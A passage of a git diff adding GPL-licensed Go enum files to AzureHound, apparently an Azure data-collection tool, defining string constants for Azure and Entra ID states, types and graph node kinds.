but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type GenericEnabledDisabled string + +const ( + Enabled GenericEnabledDisabled = "Enabled" + Disabled GenericEnabledDisabled = "Disabled" +) diff --git a/enums/geo_replication_status.go b/enums/geo_replication_status.go new file mode 100644 index 0000000..9ec93c0 --- /dev/null +++ b/enums/geo_replication_status.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type GeoReplicationStatus string + +const ( + BootstrapStatus GeoReplicationStatus = "Bootstrap" + LiveStatus GeoReplicationStatus = "Live" + Unavailable GeoReplicationStatus = "Unavailable" +) diff --git a/enums/groupvisibility.go b/enums/groupvisibility.go new file mode 100644 index 0000000..7d8fb59 --- /dev/null +++ b/enums/groupvisibility.go @@ -0,0 +1,38 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Specifies the group join policy and group content visibility for groups. +type GroupVisibility string + +const ( + // Owner permission is needed to join the group. + // Non-members cannot view the contents of the group. + GroupVisibilityPrivate GroupVisibility = "Private" + + // Anyone can join the group without needing owner permission. + // Anyone can view the contents of the group. + GroupVisibilityPublic GroupVisibility = "Public" + + // Owner permission is needed to join the group. + // Non-members cannot view the contents of the group. + // Non-members cannot see the members of the group. + // Administrators (global, company, user, and helpdesk) can view the membership of the group. + // The group appears in the global address book (GAL). + GroupVisibilityHidden GroupVisibility = "Hiddenmembership" +) diff --git a/enums/hosttype.go b/enums/hosttype.go new file mode 100644 index 0000000..998f891 --- /dev/null +++ b/enums/hosttype.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type HostType string + +const ( + RepositoryHostType HostType = "Repository" + StandardHostType HostType = "Standard" +) diff --git a/enums/hypervgeneration.go b/enums/hypervgeneration.go new file mode 100644 index 0000000..0cb8dae --- /dev/null +++ b/enums/hypervgeneration.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type HyperVGeneration string + +const ( + HyperVGenerationV1 HyperVGeneration = "V1" + HyperVGenerationV2 HyperVGeneration = "V2" +) diff --git a/enums/identity.go b/enums/identity.go new file mode 100644 index 0000000..acd6b4e --- /dev/null +++ b/enums/identity.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// The type of Identity used for the virtual machine. +// The type 'SystemAssigned, UserAssigned' includes both an implicitly created Identity and a set of user assigned +// identities. The type 'None' will remove any identities from the virtual machine. +type Identity string + +const ( + IdentityNone Identity = "None" + IdentitySystemAssigned Identity = "SystemAssigned" + IdentitySystemAssignedUserAssigned Identity = "SystemAssigned, UserAssigned" + IdentityUserAssigned Identity = "UserAssigned" +) diff --git a/enums/immutability_policy_state.go b/enums/immutability_policy_state.go new file mode 100644 index 0000000..e4fc85f --- /dev/null +++ b/enums/immutability_policy_state.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ImmutabilityPolicyState string + +const ( + LockedPolicyState ImmutabilityPolicyState = "Locked" + UnlockedPolicyState ImmutabilityPolicyState = "Unlocked" +) diff --git a/enums/immutability_policy_update_type.go b/enums/immutability_policy_update_type.go new file mode 100644 index 0000000..879e6e6 --- /dev/null +++ b/enums/immutability_policy_update_type.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ImmutabilityPolicyUpdateType string + +const ( + ExtendUpdateType ImmutabilityPolicyUpdateType = "extend" + LockUpdateType ImmutabilityPolicyUpdateType = "lock" + PutUpdateType ImmutabilityPolicyUpdateType = "put" +) diff --git a/enums/ip_filter_tag.go b/enums/ip_filter_tag.go new file mode 100644 index 0000000..341d53b --- /dev/null +++ b/enums/ip_filter_tag.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type IpFilterTag string + +const ( + DefaultIpFilterTag IpFilterTag = "Default" + ServiceTagIpFilterTag IpFilterTag = "ServiceTag" + XffProxyIpFilterTag IpFilterTag = "ManXffProxyual" +) diff --git a/enums/ipallocationmethod.go b/enums/ipallocationmethod.go new file mode 100644 index 0000000..eaa4449 --- /dev/null +++ b/enums/ipallocationmethod.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type IPAllocationMethod string + +const ( + IPAllocationMethodDynamic IPAllocationMethod = "Dynamic" + IPAllocationMethodStatic IPAllocationMethod = "Static" +) diff --git a/enums/ipsku.go b/enums/ipsku.go new file mode 100644 index 0000000..10a55ca --- /dev/null +++ b/enums/ipsku.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type IPSku string + +const ( + IPSkuBasic IPSku = "Basic" + IPSkuStandard IPSku = "Standard" +) diff --git a/enums/ipskutier.go b/enums/ipskutier.go new file mode 100644 index 0000000..ae6d455 --- /dev/null +++ b/enums/ipskutier.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type IPSkuTier string + +const ( + IPSkuTierGlobal IPSkuTier = "Global" + IPSkuTierRegional IPSkuTier = "Regional" +) diff --git a/enums/key-vault-access-type.go b/enums/key-vault-access-type.go new file mode 100644 index 0000000..d0a2fed --- /dev/null +++ b/enums/key-vault-access-type.go @@ -0,0 +1,34 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type KeyVaultAccessType = string + +const ( + GetCerts KeyVaultAccessType = "GetCerts" + GetKeys KeyVaultAccessType = "GetKeys" + GetSecrets KeyVaultAccessType = "GetSecrets" +) + +func KeyVaultAccessPolicies() []KeyVaultAccessType { + return []KeyVaultAccessType{ + GetCerts, + GetKeys, + GetSecrets, + } +} diff --git a/enums/kind.go b/enums/kind.go new file mode 100644 index 0000000..9d3fbd9 --- /dev/null +++ b/enums/kind.go @@ -0,0 +1,83 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type Kind string + +const ( + KindAZApp Kind = "AZApp" + KindAZAppMember Kind = "AZAppMember" + KindAZAppOwner Kind = "AZAppOwner" + KindAZDevice Kind = "AZDevice" + KindAZDeviceOwner Kind = "AZDeviceOwner" + KindAZGroup Kind = "AZGroup" + KindAZGroupMember Kind = "AZGroupMember" + KindAZGroupOwner Kind = "AZGroupOwner" + KindAZKeyVault Kind = "AZKeyVault" + KindAZKeyVaultAccessPolicy Kind = "AZKeyVaultAccessPolicy" + KindAZKeyVaultContributor Kind = "AZKeyVaultContributor" + KindAZKeyVaultKVContributor Kind = "AZKeyVaultKVContributor" + KindAZKeyVaultOwner Kind = "AZKeyVaultOwner" + KindAZKeyVaultRoleAssignment Kind = "AZKeyVaultRoleAssignment" + KindAZKeyVaultUserAccessAdmin Kind = "AZKeyVaultUserAccessAdmin" + KindAZManagementGroup Kind = "AZManagementGroup" + KindAZManagementGroupRoleAssignment Kind = "AZManagementGroupRoleAssignment" + KindAZManagementGroupOwner Kind = "AZManagementGroupOwner" + KindAZManagementGroupDescendant Kind = "AZManagementGroupDescendant" + KindAZManagementGroupUserAccessAdmin Kind = "AZManagementGroupUserAccessAdmin" + KindAZResourceGroup Kind = "AZResourceGroup" + KindAZResourceGroupRoleAssignment Kind = "AZResourceGroupRoleAssignment" + KindAZResourceGroupOwner Kind = "AZResourceGroupOwner" + KindAZResourceGroupUserAccessAdmin Kind = "AZResourceGroupUserAccessAdmin" + KindAZRole Kind = "AZRole" + KindAZRoleAssignment Kind = "AZRoleAssignment" + KindAZServicePrincipal Kind = "AZServicePrincipal" + KindAZServicePrincipalOwner Kind = "AZServicePrincipalOwner" + KindAZSubscription Kind = "AZSubscription" + KindAZSubscriptionRoleAssignment Kind = "AZSubscriptionRoleAssignment" + KindAZSubscriptionOwner Kind = "AZSubscriptionOwner" + KindAZSubscriptionUserAccessAdmin Kind = "AZSubscriptionUserAccessAdmin" + KindAZTenant Kind = "AZTenant" + KindAZUser Kind = "AZUser" + KindAZVM Kind = "AZVM" + KindAZVMAdminLogin Kind = "AZVMAdminLogin" + KindAZVMAvereContributor Kind = "AZVMAvereContributor" + KindAZVMContributor Kind = "AZVMContributor" + KindAZVMOwner Kind = "AZVMOwner" + KindAZVMRoleAssignment Kind = "AZVMRoleAssignment" + KindAZVMUserAccessAdmin Kind = "AZVMUserAccessAdmin" + KindAZVMVMContributor Kind = "AZVMVMContributor" + KindAZAppRoleAssignment Kind = "AZAppRoleAssignment" + KindAZStorageAccount Kind = "AZStorageAccount" + KindAZStorageAccountRoleAssignment Kind = "AZStorageAccountRoleAssignment" + KindAZStorageContainer Kind = "AZStorageContainer" + KindAZAutomationAccount Kind = "AZAutomationAccount" + KindAZAutomationAccountRoleAssignment Kind = "AZAutomationAccountRoleAssignment" + KindAZLogicApp Kind = "AZLogicApp" + KindAZLogicAppRoleAssignment Kind = "AZLogicAppRoleAssignment" + KindAZFunctionApp Kind = "AZFunctionApp" + KindAZFunctionAppRoleAssignment Kind = "AZFunctionAppRoleAssignment" + KindAZContainerRegistry Kind = "AZContainerRegistry" + KindAZContainerRegistryRoleAssignment Kind = "AZContainerRegistryRoleAssignment" + KindAZWebApp Kind = "AZWebApp" + KindAZWebAppRoleAssignment Kind = "AZWebAppRoleAssignment" + KindAZManagedCluster Kind = "AZManagedCluster" + KindAZManagedClusterRoleAssignment Kind = "AZManagedClusterRoleAssignment" + KindAZVMScaleSet Kind = "AZVMScaleSet" + KindAZVMScaleSetRoleAssignment Kind = "AZVMScaleSetRoleAssignment" +) diff --git a/enums/lease_duration.go b/enums/lease_duration.go new file mode 100644 index 0000000..7030d49 --- /dev/null +++ b/enums/lease_duration.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LeaseDuration string + +const ( + FixedLeaseDuration LeaseDuration = "Fixed" + InfiniteLeaseDuration LeaseDuration = "Infinite" +) diff --git a/enums/lease_state.go b/enums/lease_state.go new file mode 100644 index 0000000..41077cb --- /dev/null +++ b/enums/lease_state.go @@ -0,0 +1,28 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LeaseState string + +const ( + AvailableLeaseState LeaseState = "Available" + BreakingLeaseState LeaseState = "Breaking" + BrokenLeaseState LeaseState = "Broken" + ExpiredLeaseState LeaseState = "Expired" + LeasedLeaseState LeaseState = "Leased" +) diff --git a/enums/lease_status.go b/enums/lease_status.go new file mode 100644 index 0000000..70cb71f --- /dev/null +++ b/enums/lease_status.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LeaseStatus string + +const ( + LockedLeaseStatus LeaseStatus = "Locked" + UnlockedLeaseStatus LeaseStatus = "Unlocked" +) diff --git a/enums/legalagegroup.go b/enums/legalagegroup.go new file mode 100644 index 0000000..f941f3e --- /dev/null +++ b/enums/legalagegroup.go @@ -0,0 +1,36 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LegalAgeGroup string + +const ( + // The user is considered a minor based on the age-related regulations of their country or region and the + // administrator of the account has obtained appropriate consent from a parent or guardian. + LegalAgeGroupMinorWithParentalConsent LegalAgeGroup = "minorWithParentalConsent" + + // The user is considered an adult based on the age-related regulations of their country or region. + LegalAgeGroupAdult LegalAgeGroup = "adult" + + // The user is from a country or region that has statutory regulations and the user's age is more than the upper + // limit of kid age and less than the lower limit of adult age as defined by the user's country or region. + LegalAgeGroupNotAdult LegalAgeGroup = "notAdult" + + // The user is a minor but is from a country or region that has no age-related regulations. + LegalAgeGroupMinorNoParentalConsentRequired LegalAgeGroup = "minorNoParentalConsentRequired" +) diff --git a/enums/legalagegrouprule.go b/enums/legalagegrouprule.go new file mode 100644 index 0000000..295433c --- /dev/null +++ b/enums/legalagegrouprule.go @@ -0,0 +1,40 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +// Specifies the legal age group rule that applies to users of the app. +type LegalAgeGroupRule string + +const ( + // Enforces the legal minimum This means parental consent is required for minors in the EU and Korea. + // + // Default + LegalAgeGroupRuleAllow LegalAgeGroupRule = "Allow" + + // Enforces the user to specify date of birth to comply with COPPA rules. + LegalAgeGroupRuleRequireConsentForPrivacyServices LegalAgeGroupRule = "RequireConsentForPrivacyServices" + + // Requires parental consent for ages below 18, regardless of country minor rules. + LegalAgeGroupRuleRequireConsentForMinors LegalAgeGroupRule = "RequireConsentForMinors" + + // Requires parental consent for ages below 14, regardless of country minor rules. + LegalAgeGroupRuleRequireConsentForKids LegalAgeGroupRule = "RequireConsentForKids" + + // Blocks minors from using the app. + LegalAgeGroupRuleBlockMinors LegalAgeGroupRule = "BlockMinors" +) diff --git a/enums/licenseerror.go b/enums/licenseerror.go new file mode 100644 index 0000000..2eb4282 --- /dev/null +++ b/enums/licenseerror.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LicenseError string + +const ( + LicenseErrorCountViolation LicenseError = "CountViolation" + LicenseErrorMutuallyExclusiveViolation LicenseError = "MutuallyExclusiveViolation" + LicenseErrorDependencyViolation LicenseError = "DependencyViolation" + LicenseErrorProhibitedInUsageLocationViolation LicenseError = "ProhibitedInUsageLocationViolation" + LicenseErrorUniquenessViolation LicenseError = "UniquenessViolation" + LicenseErrorOthers LicenseError = "Others" +) diff --git a/enums/licenseprocessingstate.go b/enums/licenseprocessingstate.go new file mode 100644 index 0000000..2980947 --- /dev/null +++ b/enums/licenseprocessingstate.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LicenseProcessingState string + +const ( + LicenseProcessingStateFalse LicenseProcessingState = "false" + LicenseProcessingStateQueued LicenseProcessingState = "QueuedForProcessing" + LicenseProcessingStateInProgress LicenseProcessingState = "ProcessingInProgress" + LicenseProcessingStateComplete LicenseProcessingState = "ProcessingComplete" +) diff --git a/enums/licensestate.go b/enums/licensestate.go new file mode 100644 index 0000000..341fbbe --- /dev/null +++ b/enums/licensestate.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LicenseState string + +const ( + LicenseStateActive LicenseState = "Active" + LicenseStateActiveWithError LicenseState = "ActiveWithError" + LicenseStateDisabled LicenseState = "Disabled" + LicenseStateError LicenseState = "Error" +) diff --git a/enums/logic_app_provisioning_state.go b/enums/logic_app_provisioning_state.go new file mode 100644 index 0000000..1e4816b --- /dev/null +++ b/enums/logic_app_provisioning_state.go @@ -0,0 +1,41 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LogicAppProvisioningState string + +const ( + AcceptedProvisioningState LogicAppProvisioningState = "Accepted" + CanceledProvisioningState LogicAppProvisioningState = "Canceled" + CompletedProvisioningState LogicAppProvisioningState = "Completed" + CreatedProvisioningState LogicAppProvisioningState = "Created" + CreatingProvisioningState LogicAppProvisioningState = "Creating" + DeletedProvisioningState LogicAppProvisioningState = "Deleted" + DeletingProvisioningState LogicAppProvisioningState = "Deleting" + FailedProvisioningState LogicAppProvisioningState = "Failed" + MovingProvisioningState LogicAppProvisioningState = "Moving" + NotSpecifiedProvisioningState LogicAppProvisioningState = "NotSpecified" + ReadyProvisioningState LogicAppProvisioningState = "Ready" + RegisteredProvisioningState LogicAppProvisioningState = "Registered" + RegisteringProvisioningState LogicAppProvisioningState = "Registering" + RunningProvisioningState LogicAppProvisioningState = "Running" + SucceededProvisioningState LogicAppProvisioningState = "Succeeded" + UnregisteredProvisioningState LogicAppProvisioningState = "Unregistered" + UnregisteringProvisioningState LogicAppProvisioningState = "Unregistering" + UpdatingProvisioningState LogicAppProvisioningState = "Updating" +) diff --git a/enums/logic_app_state.go b/enums/logic_app_state.go new file mode 100644 index 0000000..18e7034 --- /dev/null +++ b/enums/logic_app_state.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type LogicAppState string + +const ( + CompletedLogicAppState LogicAppState = "Completed" + DeletedLogicAppState LogicAppState = "Deleted" + DisabledLogicAppState LogicAppState = "Disabled" + EnabledLogicAppState LogicAppState = "Enabled" + NotSpecifiedLogicAppState LogicAppState = "NotSpecified" + SuspendedLogicAppState LogicAppState = "Suspended" +) diff --git a/enums/maintenanceoperationcode.go b/enums/maintenanceoperationcode.go new file mode 100644 index 0000000..d0e487d --- /dev/null +++ b/enums/maintenanceoperationcode.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type MaintenanceOperationCode string + +const ( + MaintenanceOperationCodeAborted MaintenanceOperationCode = "MaintenanceAborted" + MaintenanceOperationCodeCompleted MaintenanceOperationCode = "MaintenanceCompleted" + MaintenanceOperationCodeNone MaintenanceOperationCode = "None" + MaintenanceOperationCodeRetryLater MaintenanceOperationCode = "RetryLater" +) diff --git a/enums/managed_pipeline_mode.go b/enums/managed_pipeline_mode.go new file mode 100644 index 0000000..cc5c98c --- /dev/null +++ b/enums/managed_pipeline_mode.go @@ -0,0 +1,25 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type ManagedPipelineMode string + +const ( + ClassicPipelineMode ManagedPipelineMode = "Classic" + IntegratedPipelineMode ManagedPipelineMode = "Integrated" +) diff --git a/enums/messagedeliveryoptions.go b/enums/messagedeliveryoptions.go new file mode 100644 index 0000000..ff3e462 --- /dev/null +++ b/enums/messagedeliveryoptions.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package enums + +type MessageDeliveryOptions string + +const ( + MessageDeliveryOptionsSendToDelegateAndInformationToPrincipal MessageDeliveryOptions = "sendToDelegateAndInformationToPrincipal" + MessageDeliveryOptionsSendToDelegateAndPrincipal MessageDeliveryOptions = "sendToDelegateAndPrincipal" + MessageDeliveryOptionsSendToDelegateOnly MessageDeliveryOptions = "sendToDelegateOnly" +) diff --git a/enums/migration_state.go b/enums/migration_state.go new file mode 100644 index 0000000..26795c1 --- /dev/null +++ 